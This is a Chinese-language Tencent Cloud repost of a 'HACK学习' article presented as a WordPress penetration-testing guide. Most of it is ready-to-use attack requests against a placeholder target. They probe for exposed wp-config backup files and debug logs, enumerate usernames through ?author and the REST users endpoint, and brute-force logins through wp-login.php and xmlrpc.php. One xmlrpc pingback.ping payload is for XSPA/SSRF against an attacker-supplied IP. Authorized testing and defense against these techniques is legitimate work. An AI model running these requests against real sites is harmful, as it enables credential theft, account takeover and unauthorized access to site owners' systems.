前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >干货 | Wordpress网站渗透方法指南

干货 | Wordpress网站渗透方法指南

作者头像
HACK学习
发布2022-10-27 15:47:30
2.9K0
发布2022-10-27 15:47:30
举报
文章被收录于专栏:HACK学习HACK学习

如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?

如何挖掘Wordpress网站的漏洞

如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。

或者你可以访问https://target.com/wp-login.php,它是 WordPress 登录管理页面

通过查看核心、插件和主题版本找到相关的CVE

如何找到wordpress版本

代码语言:javascript
复制
https://target.com/feed 
https://target.com/?feed=rss2

如何找到插件版本

代码语言:javascript
复制
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
https://target.com/wp-content/plugins/PLUGINNAME/README.txt
https://target.com/wp-content/plugins/PLUGINNAME/README.TXT

如何找到主题版本

代码语言:javascript
复制
https://target.com/wp-content/themes/THEMENAME/style.css 
https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)

如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用

查找日志文件

代码语言:javascript
复制
http://target.com/wp-content/debug.log

查找备份文件 wp-config

代码语言:javascript
复制
http://target.com/.wp-config.php.swp
http://target.com/wp-config.inc
http://target.com/wp-config.old
http://target.com/wp-config.txt
http://target.com/wp-config.html
http://target.com/wp-config.php.bak
http://target.com/wp-config.php.dist
http://target.com/wp-config.php.inc
http://target.com/wp-config.php.old
http://target.com/wp-config.php.save
http://target.com/wp-config.php.swp
http://target.com/wp-config.php.txt
http://target.com/wp-config.php.zip
http://target.com/wp-config.php.html
http://target.com/wp-config.php~

获取网站上的用户名

代码语言:javascript
复制
http://target.com/?author=1

或者

代码语言:javascript
复制
http://target.com/wp-json/wp/v2/users 
http://target.com/?rest_route=/wp/v2/users

爆破后台账号密码

代码语言:javascript
复制
POST /wp-login.php HTTP/1.1
Host: target.com

log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

或者

代码语言:javascript
复制
POST /xmlrpc.php HTTP/1.1
Host: target.com

<?xml version="1.0" encoding="UTF-8"?>
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params> 
<param><value>admin</value></param> 
<param><value>BRUTEFORCE_IN_HERE</value></param> 
</params> 
</methodCall>

wordpress 中的 XSPA

代码语言:javascript
复制
POST /xmlrpc.php HTTP/1.1
Host: target.com

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com></string>
</value>
</param></params>
</methodCall>

注册启用

代码语言:javascript
复制
http://example.com/wp-login.php?action=register
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-09-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 如何挖掘Wordpress网站的漏洞
  • 如何找到wordpress版本
  • 如何找到插件版本
  • 如何找到主题版本
  • 查找日志文件
  • 获取网站上的用户名
  • 爆破后台账号密码
  • wordpress 中的 XSPA
  • 注册启用
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档